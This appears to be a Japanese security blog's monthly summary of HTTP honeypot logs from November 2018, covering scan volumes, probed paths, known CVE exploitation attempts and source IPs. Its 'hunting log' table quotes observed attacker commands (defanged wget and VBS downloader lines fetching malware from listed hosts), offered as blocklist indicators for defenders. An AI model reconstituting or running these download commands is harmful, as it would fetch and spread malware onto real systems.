ハニーポットのログ分析まとめ(2018年11月度)
2018年11月度のWOWHoneypotのログ分析まとめです。
※先月分:ハニーポットのログ分析まとめ(2018年10月度) - S-Owl
<前提>
業務でプライベートSOCで監視を行っており、自組織を狙ったものか広く一般を狙ったものかを区別したく、広く一般を狙った通信を監視する為に業務と同じくhttpの通信をハニーポットで観測しています。
■スペック
台数:1台
ソフトウェア:WOWHoneypot
対象ポート:80/tcp
設置IP:日本のIP
ドメイン:取得済、未公開
運用:2018/6/5から開始
■日次のアクセス数
1ヶ月間の総アクセス数:14,797件 (前月:15,058件)
多少の波はありつつも、開始当初に比べれば多くなっています。
前月対比では微減ですが、前月はTomcat管理画面へのブルートフォースが1回に5,000件というものもあったため、それを考慮すると全体平均としては微増と考えても良いかもしれません。
アクセス数が多い日に偏りがない、土日でも多い日があることを考えると、人手の運用というよりは、自動的にスキャンしていると考えた方が良いかもしれません。
■アクセスパス
1ヶ月間のメソッド+パスの種類は808種類(前月:520種類)でした。
アクセスパスのtop20は以下です。
| 件数 | 種別 | リクエスト |
| 971 | アクセス | GET / |
| 274 | Tomcat管理ページへのブルートフォース攻撃 | GET /manager/html |
| 259 | Apache Struts2の脆弱性S2-045(CVE-2017-5638)を突く攻撃 | GET /index.action |
| 167 | phpのWebShell設置の調査 | POST /qq.php |
| 139 | phpのWebShell設置の調査 | POST /confg.php |
| 138 | phpのWebShell設置の調査 | POST /1.php |
| 119 | Weblogicの脆弱性(CVE-2018-3252)に対する調査行為 | GET /bea_wls_deployment_internal |
| 95 | phpMyAdminの調査 | GET /phpMyAdmin/scripts/setup.php |
| 95 | phpのWebShell設置の調査 | GET /cmd.php |
| 94 | phpMyAdminの調査 | GET /phpmyadmin/scripts/setup.php |
| 93 | phpのWebShell設置の調査 | POST /xx.php |
| 93 | phpMyAdminの調査 | GET /web/phpMyAdmin/index.php |
| 93 | phpのWebShell設置の調査 | GET /shell.php |
| 92 | phpのWebShell設置の調査 | POST /q.php |
| 91 | phpのWebShell設置の調査 | POST /s.php |
| 89 | phpMyAdminの調査 | GET /www/phpMyAdmin/index.php |
| 88 | phpのWebShell設置の調査 | POST /test.php |
| 88 | phpMyAdminの調査 | GET /tools/phpMyAdmin/index.php |
| 87 | phpMyAdminの調査 | GET /claroline/phpMyAdmin/index.php |
| 86 | phpMyAdminの調査 | GET /phpMyAdmin/phpMyAdmin/index.php |
同じような件数のアクセスで同じ種類のアクセスは1回のアクセスで連続して同一IPから来ているものであり、また、長期的に見ても同様ということは、恐らくは同じ攻撃者がアクセスしてきているものと思われます。
この攻撃者は定期的にアクセスするパスを追加しています。そのため、同種の攻撃ですが件数にややばらつきが生じています。
アクセスパスから攻撃種別を分類し、種別毎のアクセス数を算出したもののTop20は以下です。
| 件数 | 種別 |
| 8429 | phpのWebShell設置の調査 |
| 3622 | phpMyAdminの調査 |
| 976 | アクセス |
| 375 | (不明) |
| 322 | Apache Struts2の脆弱性S2-045(CVE-2017-5638)を突く攻撃 |
| 274 | Tomcat管理ページへのブルートフォース攻撃 |
| 176 | PHPWetherMapの調査 |
| 120 | Weblogicの脆弱性(CVE-2018-3252)に対する調査行為 |
| 85 | WordPressの調査 |
| 54 | WebDAVの調査 |
| 51 | 不正中継の調査 |
| 49 | IISの脆弱性(CVE-2017-7269)を突く攻撃 |
| 42 | クローリング |
| 36 | cfgファイルの調査 |
| 34 | JBossに対する調査 |
| 30 | オープンディレクトリの調査 |
| 12 | Hadoop YARN ResourceManagerの脆弱性を突く攻撃 |
| 12 | 調査 |
| 11 | FCKeditorの調査 |
| 10 | Linux向けInternetGatwayの調査 |
phpのWebShell設置の調査とphpMyAdminの調査は同じIPからアクセスがあることが多く、同じ攻撃者が広く様々なものをスキャンしているものと思われます。それ以外にもPHPWetherMapの調査やWebDAVの調査も同一IPから来ていることがあります。
■ハンティングログ
主に任意のコード実行の脆弱性でマルウェア本体を取得しに行くようなログをまとめたものです。
企業等ではブラックリストとして遮断して良いものですが、IPベースのものは変更される頻度が高いため、ドメインの方が役に立ちます。
| 件数 | リクエスト |
| 41 | wget -c hxxp://wap.tfddos[.]net:57843/linux |
| 10 | wget -c hxxp://154.85.99[.]85:33333/fafafafa3962 |
| 8 | wget hxxp://209.141.33[.]119/avtechsh |
| 7 | wget -c hxxp://154.85.99[.]85:33333/whoaini |
| 5 | wget hxxp://103.45.109[.]111:5778/root1 |
| 5 | wget -c hxxp://154.85.99[.]85:33333/fafa68fa |
| 5 | wget -c hxxp://154.85.99[.]85:280/whoainio |
| 5 | wget -c hxxp://154.85.99[.]85:280/tsnhnb |
| 4 | wget -P /tmp hxxp://hfs.mhacker[.]cc:9278/Linux.server |
| 4 | wget -c hxxp://aaa.linuxa[.]club:57843/linux |
| 3 | Wscript.Shell) >>C:/8.vbs&echo Post.Open GET,hxxp://a46.bulehero[.]in/download.exe |
| 3 | Wscript.Shell) >>C:/6.vbs&echo Post.Open GET,hxxp://cnm.idc3389[.]top/downloader.exe |
| 3 | Wscript.Shell) >>C:/12.vbs&echo Post.Open GET,hxxp://a46.bulehero[.]in/download.exe |
| 3 | wget hxxp://104.244.76[.]210/avtech |
| 2 | wget -c hxxp://203.234.179[.]234:81/1.exe |
| 2 | wget -c hxxp://154.85.99[.]85:33333/Linux4.7 |
| 1 | wget hxxp://128.199.251[.]119/t.php |
| 1 | wget -c hxxp://66.79.179[.]213:808/11 |
| 1 | wget -c hxxp://205.209.176[.]202:2018/admin1 |
| 1 | wget -c hxxp://205.209.176[.]202:2018/888 |
| 1 | wget -c hxxp://203.234.179[.]234:81/systems |
| 1 | wget -c hxxp://198.44.228[.]3:8080/11 |
| 1 | wget -c hxxp://154.85.99[.]85:8080/TFGG123 |
| 1 | wget -c hxxp://154.85.99[.]85:33333/fafafafa3968 |
| 1 | wget -c hxxp://154.85.99[.]85:33333/9527zzz |
| 1 | wget -c hxxp://103.55.13[.]68:13333/sshk |
ドメインでアクセスするものは主にStruts2の脆弱性を突くものが多いです。特に一番件数が多いものは過去長期的に出ているものです。
それ以外のもの、主にIPでアクセスするものは主にIoTの脆弱性を狙ったものです。
■ドメイン名でのアクセス
10月から取得しているドメイン名に対してのアクセスです。取得はしていますが、特段公開等はしていないものです。
ドメイン指定でアクセスしてくるものはWordPressの調査、攻撃がダントツで多いです。それ以外はサイト情報の調査がある程度でした。
| 件数 | リクエスト |
| 105 | GET / |
| 73 | POST /wp-login.php |
| 40 | GET /robots.txt |
| 2 | HEAD / |
| 1 | GET /wp/wp-admin/ |
| 1 | GET /wp-admin/ |
| 1 | GET /wordpress/wp-admin/ |
| 1 | GET /sitemap.xml |
| 1 | GET /old/wp-admin/ |
| 1 | GET /dev/wp-admin/ |
| 1 | GET /demo/wp-admin/ |
| 1 | GET /blog/wp-admin/ |
| 1 | GET /backup/wp-admin/ |
| 1 | GET /ads.txt |
■送信元IP
送信元IPは1173件(前月:1049件)です。
アクセスがあったIPを地図にマッピングすると以下になります。
件数の多い上位のIPと件数は以下となります。
これらの内、上位に位置するものはアクセス数が同じ程度であり、これは主にphpのWebShell設置の調査とphpMyAdminの調査を行ってくる送信元になります。日々アクセスしてくるIPを変えながら、様々なスキャンを行っているものと考えられます。
以上です。
